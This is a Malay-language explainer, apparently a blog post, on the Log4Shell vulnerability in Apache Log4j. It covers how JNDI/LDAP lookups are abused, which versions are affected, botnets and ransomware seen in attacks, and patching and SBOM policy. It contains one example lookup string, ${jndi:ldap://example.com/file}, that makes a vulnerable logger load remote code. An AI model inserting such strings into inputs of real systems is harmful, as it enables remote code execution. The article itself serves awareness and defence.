Jadual Kandungan[Sembunyi][Tunjukkan]
Pada penghujung November 2021, kami menemui ancaman besar terhadap keselamatan siber. Eksploitasi ini berpotensi menjejaskan berjuta-juta sistem komputer di seluruh dunia.
Ini ialah panduan tentang kelemahan Log4j dan bagaimana kecacatan reka bentuk yang diabaikan menyebabkan lebih 90% perkhidmatan komputer dunia terbuka untuk diserang.
Apache Log4j ialah utiliti pembalakan berasaskan Java sumber terbuka yang dibangunkan oleh Yayasan Perisian Apache. Asalnya ditulis oleh Ceki Gülcü pada tahun 2001, ia kini menjadi sebahagian daripada Perkhidmatan Pembalakan Apache, sebuah projek Yayasan Perisian Apache.
Syarikat di seluruh dunia menggunakan perpustakaan Log4j untuk membolehkan log masuk pada aplikasi mereka. Malah, pustaka Java begitu banyak terdapat di mana-mana, anda boleh menemuinya dalam aplikasi daripada Amazon, Microsoft, Google dan banyak lagi.
Penonjolan perpustakaan bermakna bahawa sebarang potensi kecacatan dalam kod itu boleh menyebabkan berjuta-juta komputer terbuka kepada penggodaman. Pada 24 November 2021, a keselamatan awan penyelidik yang bekerja untuk Alibaba menemui kecacatan yang teruk.
Kerentanan Log4j, yang juga dikenali sebagai Log4Shell, wujud tanpa disedari sejak 2013. Kerentanan tersebut membenarkan pelaku berniat jahat menjalankan kod pada sistem terjejas yang menjalankan Log4j. Ia telah didedahkan secara terbuka pada 9 Disember 2021
Pakar industri memanggil kecacatan Log4Shell sebagai kelemahan terbesar dalam ingatan baru-baru ini.
Pada minggu selepas penerbitan kerentanan, pasukan keselamatan siber mengesan berjuta-juta serangan. Sesetengah penyelidik juga memerhatikan kadar lebih daripada seratus serangan seminit.
Bagaimana ia berfungsi?
Untuk memahami sebab Log4Shell sangat berbahaya, kita perlu memahami kemampuannya.
Kerentanan Log4Shell membolehkan pelaksanaan kod sewenang-wenangnya, yang pada asasnya bermakna penyerang boleh menjalankan sebarang arahan atau kod pada mesin sasaran.
Bagaimanakah ia mencapai ini?
Pertama, kita perlu memahami apa itu JNDI.
Antara Muka Penamaan dan Direktori Java (JNDI) ialah perkhidmatan Java yang membolehkan program Java menemui dan mencari data dan sumber melalui nama. Perkhidmatan direktori ini penting kerana ia menyediakan set rekod yang teratur untuk pembangun rujukan dengan mudah semasa membuat aplikasi.
JNDI boleh menggunakan pelbagai protokol untuk mengakses direktori tertentu. Salah satu protokol ini ialah Lightweight Directory Access Protocol, atau LDAP.
Apabila log rentetan, log4j melakukan penggantian rentetan apabila mereka menemui ungkapan bentuk ${prefix:name}
.
Sebagai contoh, Text: ${java:version}
mungkin dilog sebagai Teks: Java versi 1.8.0_65. Penggantian seperti ini adalah perkara biasa.
Kita juga boleh mempunyai ungkapan seperti Text: ${jndi:ldap://example.com/file}
yang menggunakan sistem JNDI untuk memuatkan objek Java daripada URL melalui protokol LDAP.
Ini secara berkesan memuatkan data yang datang dari URL tersebut ke dalam mesin. Mana-mana penggodam yang berpotensi boleh mengehoskan kod berniat jahat pada URL awam dan menunggu mesin menggunakan Log4j untuk log ia.
Memandangkan kandungan mesej log mengandungi data dikawal pengguna, penggodam boleh memasukkan rujukan JNDI mereka sendiri yang menghala ke pelayan LDAP yang mereka kawal. Pelayan LDAP ini boleh penuh dengan objek Java berniat jahat yang JNDI boleh laksanakan melalui kelemahan.
Apa yang memburukkan keadaan ini ialah ia tidak kira sama ada aplikasi itu adalah bahagian pelayan atau aplikasi bahagian klien.
Selagi ada cara untuk pembalak membaca kod hasad penyerang, aplikasi masih terbuka untuk mengeksploitasi.
Siapa yang terjejas?
Kerentanan menjejaskan semua sistem dan perkhidmatan yang menggunakan APache Log4j, dengan versi 2.0 sehingga dan termasuk 2.14.1.
Beberapa pakar keselamatan menasihatkan bahawa kelemahan itu mungkin memberi kesan kepada beberapa aplikasi menggunakan Java.
Cacat itu pertama kali ditemui dalam permainan video Minecraft milik Microsoft. Microsoft telah menggesa pengguna mereka untuk menaik taraf perisian Minecraft edisi Java mereka untuk mengelakkan sebarang risiko.
Jen Easterly, Pengarah Agensi Keselamatan Siber dan Infrastruktur (CISA) mengatakan bahawa vendor mempunyai tanggungjawab utama untuk mengelakkan pengguna akhir daripada pelakon berniat jahat yang mengeksploitasi kelemahan ini.
"Vendor juga harus berkomunikasi dengan pelanggan mereka untuk memastikan pengguna akhir mengetahui bahawa produk mereka mengandungi kelemahan ini dan harus mengutamakan kemas kini perisian."
Serangan dilaporkan telah pun bermula. Symantec, sebuah syarikat yang menyediakan perisian keselamatan siber, telah memerhatikan pelbagai permintaan serangan.
Berikut ialah beberapa contoh jenis serangan yang telah dikesan oleh penyelidik:
- botnet
Botnet ialah rangkaian komputer yang berada di bawah kawalan pihak penyerang tunggal. Mereka membantu melakukan serangan DDoS, mencuri data dan penipuan lain. Penyelidik memerhatikan botnet Muhstik dalam skrip shell yang dimuat turun daripada eksploitasi Log4j.
- XMRig Miner Trojan
XMRig ialah pelombong mata wang kripto sumber terbuka yang menggunakan CPU untuk melombong token Monero. Penjenayah siber boleh memasang XMRig pada peranti orang ramai supaya mereka boleh menggunakan kuasa pemprosesan mereka tanpa pengetahuan mereka.
- Perisian Ransomware Khonsari
Ransomware merujuk kepada satu bentuk perisian hasad yang direka untuk menyulitkan fail pada komputer. Penyerang kemudiannya boleh menuntut bayaran sebagai pertukaran untuk memberikan akses kembali kepada fail yang disulitkan. Penyelidik menemui perisian tebusan Khonsari dalam serangan Log4Shell. Mereka menyasarkan pelayan Windows dan menggunakan rangka kerja .NET.
Apa yang berlaku seterusnya?
Pakar meramalkan ia mungkin mengambil masa berbulan-bulan atau mungkin bertahun-tahun untuk menyelesaikan sepenuhnya huru-hara yang disebabkan oleh kelemahan Log4J.
Proses ini melibatkan pengemaskinian setiap sistem yang terjejas dengan versi yang ditampal. Walaupun semua sistem ini ditambal, masih terdapat ancaman kemungkinan pintu belakang yang mungkin telah ditambahkan oleh penggodam pada tetingkap bahawa pelayan dibuka untuk serangan.
banyak penyelesaian dan mitigasi wujud untuk mengelakkan aplikasi daripada dieksploitasi oleh pepijat ini. Log4j versi 2.15.0-rc1 baharu menukar pelbagai tetapan untuk mengurangkan kerentanan ini.
Semua ciri yang menggunakan JNDI akan dilumpuhkan secara lalai dan carian jauh telah dihadkan juga. Melumpuhkan ciri carian pada persediaan Log4j anda akan membantu mengurangkan risiko kemungkinan eksploitasi.
Di luar Log4j, masih terdapat keperluan untuk rancangan yang lebih luas untuk menghalang eksploitasi sumber terbuka.
Terdahulu pada bulan Mei, Rumah Putih mengeluarkan satu perintah eksekutif yang bertujuan untuk meningkatkan keselamatan siber negara. Ia termasuk peruntukan untuk bil bahan perisian (SBOM) yang pada asasnya merupakan dokumen rasmi yang mengandungi senarai setiap item yang diperlukan untuk membina aplikasi.
Ini termasuk bahagian seperti sumber terbuka pakej, kebergantungan dan API yang digunakan untuk pembangunan. Walaupun idea SBOM membantu untuk ketelusan, adakah ia benar-benar membantu pengguna?
Menaik taraf kebergantungan mungkin terlalu menyusahkan. Syarikat hanya boleh memilih untuk membayar apa-apa denda daripada mengambil risiko membuang masa tambahan mencari pakej alternatif. Mungkin SBOM ini hanya akan berguna jika mereka skop adalah terhad lagi.
Kesimpulan
Isu Log4j bukan sekadar masalah teknikal untuk organisasi.
Pemimpin perniagaan mesti menyedari potensi risiko yang mungkin berlaku apabila pelayan, produk atau perkhidmatan mereka bergantung pada kod yang mereka sendiri tidak uruskan.
Bergantung pada aplikasi sumber terbuka dan pihak ketiga sentiasa datang dengan sejumlah risiko. Syarikat harus mempertimbangkan untuk mengusahakan strategi pengurangan risiko sebelum ancaman baharu didedahkan.
Kebanyakan web bergantung pada perisian sumber terbuka yang diselenggarakan oleh beribu-ribu sukarelawan di seluruh dunia.
Jika kita ingin memastikan web sebagai tempat yang selamat, kerajaan dan syarikat harus melabur dalam membiayai usaha sumber terbuka dan agensi keselamatan siber seperti CISA.
Sila tinggalkan balasan anda